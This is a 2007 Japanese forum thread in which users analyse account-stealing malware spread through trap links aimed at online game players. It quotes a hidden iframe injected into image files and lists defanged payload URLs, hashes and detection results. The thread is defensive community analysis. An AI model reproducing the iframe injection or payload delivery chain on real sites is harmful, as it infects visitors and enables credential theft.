その罠ファイル文末にこんな一文が含まれる、これはClamWin(ClamAV)でも検知できる。
lmydj■vip■5944■net/mm■htm

mm■htmのVIRUSTOTAL結果、明暗はっきり
ttp://www.virustotal.com/vt/en/resultadof?dde4e8cabc293e6e6b554e96945714e9


登録情報、前者だけ。
後者はどっかのサービス使ってるようだ。

Domain Name.......... bdjyw■net
Organisation Name.... jet
Organisation Address. nanning
Organisation Address.
Organisation Address. nanning　(南寧市　広西チワン族自治区首府)
Organisation Address. 537000
Organisation Address. GX
Organisation Address. CN

659 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 11:17 ID:I9VZMJih0

>>649
真っ黒も真っ黒、〜ってパトレイバー劇場版の作中のセリフが思い浮かんだオレ中年。


jpドメインからのアクセスだと多少厄介ですね。
前にでた163data.com.cnもだけど、cha-cache1-1.cache.telstra.net　ってところからもあった。

660 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 11:30 ID:GKEN1oAm0

>>659
telstra.netはいつもの連中がTEACUP爆撃とかで愛用してる国外プロキシ。
塞いでも問題ないと思う。

661 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 11:36 ID:I9VZMJih0

>>660
了解。
.htaccessで、.cnと、一部IP帯はふさいだけど、telstra.netも塞いでおくことにします。

662 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 11:38 ID:T79riTlD0

>>658
おー。トップまでは見てなかった。
そのjpgからmm.htmの発動はMS04-028(GDI+)かな。
ちょっといじってみま。

663 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 11:41 ID:15FtOVLW0

ofsfb-21p4-127.ppp11.odn.ad.jpはROM776さんの所のBBSにも
爆撃したようで、TOPに注意が出てた。

jpドメインからの罠書き込み増えた場合、どうしたものかねぇ？
ODNからのアクセス拒否とかは弊害大きいだろうし。

664 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 11:55 ID:T79riTlD0

>>658
スクリプト読むのが面倒なのでdocument.writeをwindow.alertに。
ttp://www.mmobbs.com/uploader/files/2490.png
123.exe を拾う模様…なんだけどさっぱり落ちてきませんわ
(32kbpsなAirEDGEじゃきついか)。

665 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 12:27 ID:PQrlDOhZ0

>>664
その画像のメッセージに入ってるのは
http://lmydj■vip■5944■net/123■exe だな。

NOD32だと、Win32/Hupigon トロイの亜種 と検知した。

666 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 12:39 ID:PQrlDOhZ0

>>664-665
カスペオンラインスキャンのファイルスキャンにかけてみた。
「You're clean!」と出て検知しない。

えーと、検体提出窓口どこだっけ…LiveROにリストあったな。ちょっと提出してくる。

667 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 12:52 ID:T79riTlD0

パス無しzipで newvirusあっとkaspersky.com に発射〜。
Dr.WEBのスキャナはスキャン後のフォームからそのまま発射できるんだよな…。

668 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 14:21 ID:PQrlDOhZ0

LiveROにあったアドレス全部に、>664の 123 exe と、>656の svchost exe を送ってみた。
もう反応が帰ってきたもの。（NOD32は最初から亜種として検知。特定名の返事はまだ）

svchost：
NOD32 -> Win32/PSW.Maran トロイ の亜種(zip圧縮すると、Win32/Bagle.gen.zip ワーム)
CA Security Advisor -> malware

123：
NOD32 -> Win32/Hupigon トロイ の亜種
Sophos Anti-Virus -> 新種のTroj/GrayBr-Gen

669 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 14:32 ID:PQrlDOhZ0

>656の svchost exe

カスペからの返答：（特定名：Trojan-PSW.Win32.Maran.cj 次回updateで対応）
New malicious software was found in the attached file.
Trojan-PSW.Win32.Maran.cj
It's detection will be included in the next update. Thank you for your help.

670 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 14:57 ID:PQrlDOhZ0

>664の 123 exe

カスペからの返答：（特定名：Backdoor.Win32.Hupigon.erf 次回updateで対応）

New malicious software was found in the attached file.
Backdoor.Win32.Hupigon.erf
It's detection will be included in the next update. Thank you for your help

671 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 14:57 ID:NjDMcpQI0

>>658,662
未知のJPEG脆弱性利用だとしたら、かなりやばい代物ですね。
2004年に問題になったMS04-028(JPEG脆弱性)だとすれば、
ウイルス対策ソフトにまったく引っかからないというのが気になりますし。
(ちなみに最近問題のANIファイルはかなり高い確率で検出できます)

ちょっとカラクリをまとめておきますが、問題のURL（http://www■bdjyw■net/）
をソースチェッカーで調べると、HTMLソース中に次のタグを発見。
<img src="images/logo.jpg" width="186" height="64">

このJPEGファイル（http://www■bdjyw■net/images/logo■jpg）をダウンロードし、
バイナリエディタで開くと、ファイルの最後に次のテキストが埋め込まれています。
<iframe src=http://lmydj■vip.5944■net/mm■htm width=0 height=0></iframe>

ANIファイルと異なる点は、HTMLタグが埋め込まれているという点です。
(ANIファイルはEXEファイルへのURLが埋め込まれます）

672 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 15:04 ID:GKEN1oAm0

>>671
改めて調べなおすとwww■bdjyw■net/images/以下の画像ファイル全部に同じ罠があるよ。
つまりTOPにアクセスして出てくる画像リンク全部ってこと。
直にアクセスしたらこれでもかと言わんばかりに罠を仕込まれちゃう。
これは危険ドメイン以外の何者でも無い。

673 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 15:14 ID:T79riTlD0

やっと123.exe落とせた〜! VirusTotalに投げたら半数以上が検知。
Microsoftですら検知しているのにNorton・McAfee・Kasperskyが見逃すという珍品でした。
おそらくバックドア、その意味ではBitDefenderは少し怪しい。
で、中身を見たらなんじゃこりゃ…。わけわからん。踏んだら駆除できる自信がない。

674 ：653 sage ： 2007/04/17(火) 15:36 ID:jpsfXa1o0

つい1時間前ぐらいにまたodnｷﾀﾜｰ。
ofsfb-21p4-127.ppp11.odn.ad.jp

物理的にどこなんだろね。国内だし警察に通報とかできねーかな。

675 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 15:42 ID:T79riTlD0

ODNに通報でいいと思う。

676 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 16:17 ID:T79riTlD0

あー、これMS04-028とかそんな高度な話しじゃないや。
jpgだけじゃなくgifにも、動くわけがないcssにもiframeが追記されてる。
全ファイル(IIS5のpublic内だけ?)に追記するプログラム(件の123かも)を
サーバで踏んだ(adminで踏ませた)んだ。
HTTPで飛んでくる物には漏れなくiframeが付いているので
踏むと危険なことには変わりないけど、0-dayとかじゃないや。

677 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 17:08 ID:WBv85Lzg0

当方管理サイトにも着弾を確認。
2度ほど挑戦をしてきて両者とも弾いてるのだが、Accept-Languageを
変えてきてるんだよね(zh-cn → ja)。ブラウザ名も多少変えてきているから
日本語が分かる奴なのかも知れず。エラー画面をもう少し不親切にするか。

ODNへ通報完了。只、こっちが把握しているODNの通報先はnet-abuse@〜
なんだけどabuse@のほうが良かったっけ？

678 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 17:37 ID:GKEN1oAm0

>>677
abuseのほうが担当に直接連絡がつくと言う点で良いかもね。
担当者のアドもabuse@odnだしね。

件のものの情報だとこんな具合。
Contact Information: [担当者情報]
d. [電子メイル] abuse@odn.ad.jp
f. [組織名] 日本テレコム株式会社
g. [Organization] JAPAN TELECOM CO.,LTD.

679 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 18:50 ID:nADxNDSt0

ODNから返信あり
悪質な書き込みと認識するので該当するIPのユーザーに
注意をしてくれるとのこと、その際にBBSのURLや書き込み内容などを
知らせることになるがいいか？という確認メールが来てた
対応は早い

ところで画像に何かうめこまれてるとかっていうのは
画像をメモとかで開けばわかるのかな？

680 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 19:17 ID:gpFBX71l0

>>647,653で報告されいるものと同じですが、Eir板にも新スレを作って
罠書き込みがされていました。

-----------------------------------------------------------------
カンニングだって一種の勉強

1 ：きまぐれ：2007/04/17(火) 02:43:47 ID:uWIKomt20
やる事成す事変わらない
カンニングだって一種の勉強

セージになったものの、相変わらず時計↑2でマジ狩りの日々が続いています。

未だAGIが少ないので木琴装備でもflee150という体たらく。まともに避けられ

るmobは明らかに格下なのでAGI、fleeともども170を越えるくらいまではこの生

活が続きそうです。

転職し、レベルが上がってもAGIを上げているためマジ狩りにさしたる変化は全

く無く、強くなっているのかどうかわからない状況が続いています。恐らく70

〜80代でFCASを挫折すると言うのはこの辺りが原因なのでしょう。私も心が折

れそうですし。とは言え、ようやくカビに対して避け始めているので少しずつ

ですが効果は見え始めているのかなと思います。まあ、まだLPとってないです

し来週までにはLP取得まで持っていきたいと思います。
http://www■jpxpie6-7net■com/web/read_cgi/
-----------------------------------------------------------------

4月2日にも新スレを作って罠書き込みがされている（>>380）のですが、Eir板管理人様の
削除報告によると「FKCfb-05p1-194.ppp11.odn.ad.jp」から書き込まれたもののようです。

681 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 19:59 ID:GKEN1oAm0

>>680
TEACUP爆撃では結構前から確認されていたが、いよいよかね。
FKCfb-05p1-194.ppp11.odn.ad.jp　福岡のもの。

ぐぐると幾つか4月2､3日辺りの爆撃痕があるね。
これも常時接続かネカフェあるいはゾンビか。

682 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 22:14 ID:GVUF+O8A0

RBOWikiにて偽装？されてたの踏んだ可能性が・・・　↓は踏んだ部分のソースです。
<dd><a href="http://www■blog-livedoor■net/game/" rel="nofollow">http://www13.plala.or.jp/french/</a></dd></dl>
【　　アドレス 　 】http://www■blog-livedoor■net/game/
【気付いた日時】 4/17　12時頃
【　 　　 OS　 　 】 WindowsXP Home Edition
【使用ブラウザ 】　IE
【WindowsUpdateの有無】　自動更新（2日前程）
【　アンチウイルスソフト 】 ウィルスバスター2005（1週間ほど前に更新）
【その他のSecurty対策 】 Spybot S&D、Ad-awareSE（両者とも更新時期から開きあり）
【 ウイルススキャン結果】 (ウィルスバスター　見つからず　セーフモードでAd-aware 見つからず)
【スレログやテンプレを読んだか】 (今から)
【説明】飛ぼうとしてクリックしたところ見た目真っ白なページ。
ブラウザの戻るクリックしても戻らず、連打しても戻らなかった為右上閉じるで終了
この間10秒ほど。飛んだ先のソース確認等はしてません。
別のPCからGID、アトID変更。
ウィルススキャンかけてバイトへ＞帰宅後Ad-aware＞別PCでカスペ落としてUSBにいれ
感染疑惑のPCにいれ、カスペ展開しようとしたところエラーメッセージ
Kaspersky6.0試用版[Vista対応]
ダウンロード位置\kis6jpvta.exe"読み込みエラー
WinSFX32M
インストールできませんでした。
と表示されます。次に何をすべきかご教授お願いしますorz

683 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 22:18 ID:qwAKabNZ0

>>653
そのホストは、かなり昔から荒らしに使われてるので永久にアク禁お勧め

684 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 22:34 ID:FBP/AqYB0

とりあえず2行目の　.　の置換し忘れどうにかしようぜ

685 ：682 sage ： 2007/04/17(火) 22:48 ID:GVUF+O8A0

Σ　置換忘れ部分はフランスパン公式サイトアドです。
余計なトコでお騒がせしました。orz

686 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 23:00 ID:PQrlDOhZ0

>>682
カスペ落とすのは、そのＰＣでも構わない。落としなおせ。

687 ：682 sage ： 2007/04/17(火) 23:06 ID:GVUF+O8A0

細かいトコで消費してすいませんが一応確認させてください;;
感染疑惑のPCをネットに繋いでカスペ落とせばいいんですかね？

688 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 23:10 ID:WBv85Lzg0

ROやブラウザで公式を見ない限りは大丈夫かもしれない。
しかし、既に取得された情報やRO以外の個人情報を送信される
可能性も否定できない為、『感染を疑うPCをネットワークに繋ぐ事』は
自己責任というしか。

689 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 23:23 ID:PQrlDOhZ0

取り敢えず、NOD32で検出できたので、カスペが駄目なら、NOD32を試してみてもいいかも。

−−−調査サイト−−−
http://www■blog-livedoor■net/game/
（Wikiのリストをhostsに登録してあれば開けない）
-----
開くと、次のページを開こうとする。
wz■htm
wu■htm


-----
wu■htm
-----
次のページをiframeで開こうとする。
1■htm
2■htm

-----
wu■htm
-----
現時点では、なにもない。0Byteのファイル。後で何か置かれるかも。
view-sourece: では真っ白になるだけでページが存在しない時のエラーは出ない。

690 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 23:24 ID:PQrlDOhZ0

（続き）

-----
1■htm
-----
VBスクリプトで下記のファイルを入手し、実行させよとする模様。
NOD32 検出名：Win32/PSW.Maron トロイの亜種
http://www■blog-livedoor■net/game/svch■exe

-----
2■htm
-----
下記のスクリプトを読み込む。iframeはsrc="http://" で未完成。
http://www■blog-livedoor■net/game/muxiao■js

-----
http://www■blog-livedoor■net/game/muxiao■js
-----
カーソルとして、下記のファイルを表示させようとする。
NOD32：検出名 Win32/TrojanDownloader.Ani.Gen トロイの亜種
http://www■blog-livedoor■net/game/muxiao1■jpg
http://www■blog-livedoor■net/game/muxiao2■jpg

691 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 23:28 ID:PQrlDOhZ0

>>687
Yes。パスワード変更などの盗まれる可能性のある行為をしなければ良い。

カスペで該当ファイルを検知できるかどうかは、カスペユーザーの報告がないと安心できないかも。
NOD32なら確定名ではなく亜種としてではあるものの、検知できるので、そっちでも良い。

踏んでしまった場合のテンプレに「hostsの書き換えは行なっているか」「該当アドレスはhostsに入っているか」の
確認も入れた方がいいような気がしてきた。hostsにあるから繋がらなくて真っ白なのか、踏んだ画面が真っ白なのか
区別が付かん。

692 ：(^ー^*)ノ〜さん sage ： 2007/04/17(火) 23:41 ID:WBv85Lzg0

>>691
いや完全に解析済みのウイルスだと分かっているなら"Yes"で答えても
いいと思うが、そうでないなら断言はしないほうが良いと思うぞ。
私も多分大丈夫とは思うけど、"多分"では駄目なんだから。

693 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 00:16 ID:ytcE2Xhd0

>>692
それを言ったら、感染済みの状態でステルス化されずにインストールが可能かまで考慮しないといけない。
とりあえずは「現実的解決策」レベルで答えてみた。

他ＰＣでダウンロードするのが最善なのは同意。

現在別PCでパス変更済みとのことなので、（既に盗み出された古いパスが送信されたとしても）
実害はないと判断しての回答。それ以外の個人情報についてまでは自己責任の範疇だし、垢ハック特化の
ものであるのに心配する必要は「現時点では」ないかと。

安全な環境（別パーティションや別ＨＤＤなど）から起動して検索かけることができるなら、その方法で。

694 ：682 sage ： 2007/04/18(水) 00:30 ID:IPrLmwGp0

現在NOD３２ダウンロードしてスキャンかけている最中です。
アーカイブ読み込み中にエラーやらファイルはパスワードで保護やらがわらわら出てきて
カスペの方のオンラインスキャン先にして確認した方がよかったかも・・・
とりあえず今晩の作業はここまでになりそうです。また明日お世話になるかと思いますが
よろしくお願いいたします　解決してはいませんが一区切りになりそうですので
ここまで協力してくださった方々に心からの感謝を。

695 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 00:51 ID:f4+8fYDf0

>>682,690
うちは682さんと同じくウイルスバスター使ってるんで、試しに検体を落としてみましたが、
ANIファイル２種(muxiao1.jpg, maxiao2.jpg)はバスターで検出できます。
肝心のsvch.exeはバスターでは検出できませんでした。
VirusTotalにもかけてみましたが、あまり検出率は良くないようです。

File name: svch.exe
File size: 18458 bytes
MD5: 5d9a4b4a4ccfefb275b7bf073bd84a76
SHA1: dd0328a7b5c287aaf729acf57edb29057605f8df

AntiVir　　　　　7.3.1.53　　04.17.2007　　TR/PSW.Maran.AU
Authentium　　　　　4.93.8　　04.16.2007　　could be a corrupted executable file
eSafe　　　　　　7.0.15.0　　04.16.2007　　suspicious Trojan/Worm
Fortinet　　　　　2.85.0.0　　04.17.2007　　suspicious
Sunbelt　　　　　2.2.907.0　　04.07.2007　　VIPRE.Suspicious
Webwasher-Gateway　　6.0.1　　04.17.2007　　Trojan.PSW.Maran.AU

検出可と出たのは上記６種のみで、あとはすべて不可でした。

696 ：695 sage ： 2007/04/18(水) 01:01 ID:f4+8fYDf0

すみません。svch.exeですが、落としミスってました。ファイルサイズが明らかに違うしorz
落とせたら、調べなおしてみます。サーバー側の回線がしょぼいのかどうか知りませんが、
たった４７ｋのファイルがなかなか落ちてきません。

697 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 01:07 ID:tBNe/wwN0

Authentiumは「ぶっ壊れてるよ」って言ってるじゃないか…。

698 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 01:16 ID:ytcE2Xhd0

ついでなんで、>>689-690を、カスペのオンラインスキャンでも検体を確認。

svch■exe：Trojan-PSW.Win32.Maran.cj
muxiao1■jpg：Exploit.Win32.IMG-ANI.k
muxiao2■jpg：Exploit.Win32.IMG-ANI.k

現時点で、全て検出可能なようです。

699 ：695 sage ： 2007/04/18(水) 01:21 ID:f4+8fYDf0

今度こそ、正しく落とせたと思います。svch.exeですが、ウイルスバスターで検出できます。
検体を落とした瞬間に隔離されました。ウイルス名称はTSPY_MARAN.Dでした。
バスターＯＦＦにして、VirusTotalにアップした結果は、

File name: svch.exe
File size: 48500 bytes
MD5: 6724111cc6f92a9ed32bc0381110a103
SHA1: bcdc42d920d235b030e488d6c93eb33bdc9b5bc8

AhnLab-V3 2007.4.18.0 04.17.2007 no virus found
AntiVir 7.3.1.53 04.17.2007 TR/PSW.Maran.AU
Authentium 4.93.8 04.16.2007 Possibly a new variant of W32/CrazyCrunch-based!Maximus
Avast 4.7.981.0 04.17.2007 Win32:Lineage-406
AVG 7.5.0.447 04.17.2007 PSW.Generic3.UJM
BitDefender 7.2 04.17.2007 Trojan.PWS.Maran.AY
CAT-QuickHeal 9.00 04.17.2007 (Suspicious) - DNAScan
ClamAV devel-20070312 04.17.2007 Trojan.Spy-3651
DrWeb 4.33 04.17.2007 Trojan.PWS.Maran
eSafe 7.0.15.0 04.17.2007 Win32.Maran.cj
eTrust-Vet 30.7.3574 04.17.2007 no virus found
Ewido 4.0 04.17.2007 Trojan.Maran.cj
FileAdvisor 1 04.17.2007 no virus found
Fortinet 2.85.0.0 04.17.2007 W32/Maran.CJ!tr.pws
F-Prot 4.3.2.48 04.17.2007 no virus found
F-Secure 6.70.13030.0 04.17.2007 Trojan-PSW.Win32.Maran.cj
Ikarus T3.1.1.5 04.17.2007 Trojan-Spy.Win32.Agent.hz
Kaspersky 4.0.2.24 04.17.2007 Trojan-PSW.Win32.Maran.cj
McAfee 5010 04.16.2007 Generic PWS.b
Microsoft 1.2405 04.17.2007 TrojanSpy:Win32/Maran.gen!A
NOD32v2 2198 04.17.2007 probably a variant of Win32/PSW.Maran
Norman 5.80.02 04.17.2007 W32/Viking.EQ
Panda 9.0.0.4 04.17.2007 Suspicious file
Prevx1 V2 04.17.2007 no virus found
Sophos 4.16.0 04.16.2007 Troj/Maran-Gen
Sunbelt 2.2.907.0 04.14.2007 VIPRE.Suspicious
Symantec 10 04.17.2007 Infostealer
TheHacker 6.1.6.095 04.15.2007 no virus found
VBA32 3.11.3 04.17.2007 Trojan.PWS.Maran
VirusBuster 4.3.7:9 04.17.2007 Packed/Upack
Webwasher-Gateway 6.0.1 04.17.2007 Trojan.PSW.Maran.AU

700 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 01:35 ID:ytcE2Xhd0

おつかれー。

そうすると、682さんも、（2005でもパターンは同じだろうし）検知できる環境だった可能性が高いですね。
「反応していなかった＝入手前だった」ケースかどうかの確認の為に、踏んだ疑いのあるＰＣで、
>>690にあるファイルを直接ダウンロードすることを試みるのはどうだろうか。（反応する＝入手を阻止）

あくまでもダウンロードだけで実行や表示はしないように。フォルダをつくってそこにダウンロード。
反応しないでダウンロード完了しても、フォルダごと削除。（ファイル指定だと誤爆発動の可能性がある）

パターンが古くて入手できちゃった（しかも、カスペオンラインスキャンでは入手したファイルが検知できる）なら
他のセキュリティソフトで除去するか、ＯＳ入れなおしコース。

701 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 02:26 ID:fhwGwzO/0

さるROサイトを持っている者です。

掲示板の書き込みにどう見ても罠ですなURLが頻繁にあったので
見た人が直に踏めないように
http:/を禁止ワードにして書き込めないようにしたのですが･･･。

それでもやってこられたんでなんというか必死だなと。

---以下書き込み文
「BSには精錬の好き嫌いがあるんじゃ...



３年ほどROをプレイしているが、今までちょくちょくBSで過剰精錬に挑戦して

たんだけど、どうも精錬する品によって精錬成功確立が違うような気がしてな

らない。俺の場合だとロンコの成功率が異常に高く、+７を連続４回成功させた

ことがある。しかし他のはいまいちで、シルクは10回くらい精錬して一度も+７

までにならなかった。まぁちょくちょく精錬する程度なので試行数が少ないか

らたまたまといったらそれまでなんだけど、BSになって武器研究10とった段階

でLvあげ止めてるので、BSのLvとかDexによって相性のいい精錬品があるんじゃ

ないかとか想像したりしてるんだが、他の人はどうなんだろと気になった。
詳しくはアルケミのテンプレを見ましょう。
www■jpxpie6-7net■com/web/read_cgi/
もし同じような傾向があれば教えて欲しいな。」
--------以上----

初の書き込みだというのにどう見ても罠です。
それにしても読みにくい。
なんか自サイトにあまりにも触れられていない内容の書き込みが
アダルト出会い系サイトとかを思い出させる。

702 ：701 sage ： 2007/04/18(水) 02:38 ID:fhwGwzO/0

書き込んだ後読み直したらやはり罠ですね。

>>607 >>647

へんぴな趣味管理サイトで書き込み制限していて
コレだとWikiが本当に怖い。

703 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 02:41 ID:ytcE2Xhd0

>>701
まとめサイトに上がってるアドレスをhostsに使うだけじゃなく、禁止ワードにも流用しとけ。
新ドメインには対応できないけど、やらないよりましだろ。

704 ：680 sage ： 2007/04/18(水) 02:45 ID:mqq4eyi00

>>680ですが、Eir板管理人様によりスレは削除され、その削除報告によると
今度は「ntfksm057153.fksm.nt.ftth.ppp.infoweb.ne.jp」から書き込まれたようです。
infowebって@niftyでしたっけ？

705 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 03:07 ID:I+divUlJ0

>>704
そう。
さらにfksmってことは福島か…

706 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 08:22 ID:SgO0kuoW0

毎度おなじみ福建人が新ドメインを取ったようだ。

罠は確認出来ないが前回のものを数日で使っていることを考えると
近いうちに使うと思われる。

Domain Name ..................... gamegohi■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-16 07:37:23

707 ：701 sage ： 2007/04/18(水) 08:47 ID:knWXLRZd0

>>703
早速流用しました。ご指摘感謝です。
対策は少しでもやっておいて損はないですね。

708 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 10:19 ID:SgO0kuoW0

福建人、ソーシャルブックマークに進出。
www■flog■jp/m■php/4644

709 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 12:28 ID:fwjJOLM/0

げー…。短縮URLといい、いろいろやりよる。

710 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 13:33 ID:CjCbx9gM0

>>708
なんかよくワカランサービスだなと思いつつ管理側への
通報フォームを見つけたので通報。

類似内容が有ったら報告だけでなくどしどし通報すべし！

711 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 13:37 ID:zchstlnr0

もう一つ福建人ドメイン発見、またもFC2錯誤狙い。
FC2は福建人に愛されているようです。

これも13日登録、一体いくつ取ったんだろう。
どっちにしろ罠ドメイン登録の新記録は間違いないだろう。

罠スクリプトがある場所
www■cityblog-fc2web■com/game/

Domain Name ..................... cityblog-fc2web■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 07:06:52

712 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 15:50 ID:zchstlnr0

【ブログ改竄情報】福建人にクラックされ改竄されたブログ発見。
blog■livedoor■jp/baby_babr_baby_music/

日付や流れなどからパクリとかそういうレベルではないね。
これは間違いなく不正アクセスだ。

713 ：682 sage ： 2007/04/18(水) 22:58 ID:IPrLmwGp0

本日の流れ　NODスキャン＞処理できたのとできなかったのが＞バスターRT検索のまま
＞NOD停止＞カスペオンライン＞重要なナントカ　結果０＞　マイコンピュータ　ウイルス１感染ファイル３検索続行中
＞バスターRT検索のままorz　明日の朝まで検索のまま放置してバスター終了させて検索かけ直しでいいですかね？
　あと、非常に初歩的ですが・・・　オンラインスキャンってことはLANケーブル抜いたら検索とまります？＠＠；
怖くて試せないorz

714 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 23:00 ID:pzuG6B1H0

色々しすぎてよーわからんね…、全部同時にかけてるの？

オンラインスキャンは線引っこ抜いたら止まる（はず

715 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 23:10 ID:RSGysyQa0

最初のプログラムやパターンのダウンロードが終われば
引っこ抜いても大丈夫な気もする

716 ：682 sage ： 2007/04/18(水) 23:10 ID:IPrLmwGp0

全工程でウイルスバスターのリアルタイム検索有効で右下に常駐？させたまま
１　NODでスキャンかけて　２　検索時処理できたのとできなかったのが発生
３　正直混乱してきたのでNOD終了（プログラム残ってます）
４　カスペオンラインスキャンに乗り換え　カテゴリー重要な〜　で検索結果０
５　カスペオンラインでカテゴリーマイコンピューター　で現在検索中
見つかったウィルス３　感染したオブジェクト５に増えたorz

で、複数のアンチウィルスソフトの競合？というんでしょうか
を全く考えてない事に気付いた現在です
一応終わったらウィルスバスターをどうしてからカスペオンラインかけ直ししたらいいのか不安で・・・
リアルタイムを無効に？　プログラムを終了？　アンインストール？　のどこまでやればいいのか・・・
言葉足らずですいませんでしたorz

717 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 23:47 ID:LH2nhlPB0

隔離されたファイルを再検出している気もするな

718 ：(^ー^*)ノ〜さん sage ： 2007/04/18(水) 23:54 ID:LH2nhlPB0

オンラインスキャンならウイルスバスターは、そのままでも問題なく出来るはず
#実際にやってたし

上手く動作しないようならウイルスバスターを終了させてから、オンラインスキャンを
実行する


もしカスペルスキー試用版とかをインストールするなら、ウイルスバスターを
アンインストールしてからインストールすること

719 ：にゅぼーん にゅぼーん ： にゅぼーん

にゅぼーん

720 ：(^ー^*)ノ〜さん ： 2007/04/19(木) 00:29 ID:BOjyR3bM0

最近RMCでの垢ハックURL付き記事が酷く目立ちますね、ご注意をあげ

721 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 00:31 ID:3k8wjwin0

ラグナロクサーチは実際にあるから危険だな。

722 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 01:14 ID:Xcmm/SOb0

fujianが／(^o^)＼ﾌｯｼﾞｻｰﾝに見えた

723 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 06:56 ID:Km33pbip0

>>320 のlovejpjp■comがちょっと面白い。
スクリプトは以下略でトロイは/22.exe。
ROとLineageの組み合わせはMaranなどでよく見るけど、
これはLineageとMapleStoryのハイブリッドアカハック。
さらに面白いのがbidder■ccにログインして何やらやっているところ
(台湾のヤフオクみたいなところっぽい)。
アカハックした上で自動で出品(売却)までやっちまう予感。

>>712
ブログのアカハックは珍しいね。
トラックバック飛ばしまくる予感。

724 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 07:01 ID:rIQ1l5YP0

>>723
すげーなそれ…。適当にばらまくだけで金が入るのか。
怒るのも呆れるのも笑うのも通り越して感心してしまったｗ

725 ：(^ー^*)ノ〜さん ： 2007/04/19(木) 07:09 ID:mtCMIhOk0

注意勧告age
>>712にあるように、livedoorブログに不正アクセスをかけて垢ハックを仕込む手口があります。
個人ブログを閲覧するだけで垢ハックされる危険があります。

726 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 08:54 ID:Km33pbip0

一部のMaranが新しい圧縮形式に差し替えられているので注意
(NPack圧縮で74kB。従来のUpack圧縮は50kB程度、未圧縮なら150kB程度)。
例:www■ro-bot■net/ro-navi/yan.exe
NPack対応エンジンであることと、今までの検体の解析の際に
解凍して(未圧縮への)パターンを作っていれば検知するはず。

727 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 09:19 ID:gKnSnquA0

>>726
NOD32ではWin32/PSW.Maron トロイの亜種として検知されたな。

728 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 10:23 ID:Km33pbip0

美味しそうな名前だな。

729 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 10:30 ID:HHdWzbSD0

>>584他で出てくるホスト
OFSfb-21p4-127.ppp11.odn.ad.jp

リネージュ資料室のハエ取り紙(拒否履歴)にかかってる。

2007/04/18 15:03:41 OFSfb-21p4-127.ppp11.odn.ad.jp
2007/04/18 12:55:54 OFSfb-21p4-127.ppp11.odn.ad.jp

15時のほうはGoogle.cn使ってなにやら検索をかけてる模様。

730 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 10:48 ID:BOjyR3bM0

RMCの方もODNを利用しての書き込みのようですね、プロバイダ通報はどうなんだろう

731 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 10:54 ID:VUyqWbTE0

C:\WINDOWS\system32\Packet.dll
とURL Snooper（未起動）が
Backdoor.Win32.ForBot.t
に感染していたみたいなんですが、垢ハックでしょうか？
ウィルス情報のページが英語のページばかりでよくわかりません。

732 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 11:12 ID:F1g9qBEU0

マロン(栗)ならmaronじゃなくてmarronだな。

そういえばOFSfb-21p4-127でググるとRMTサイトの宣伝書き込みに当たったんだが
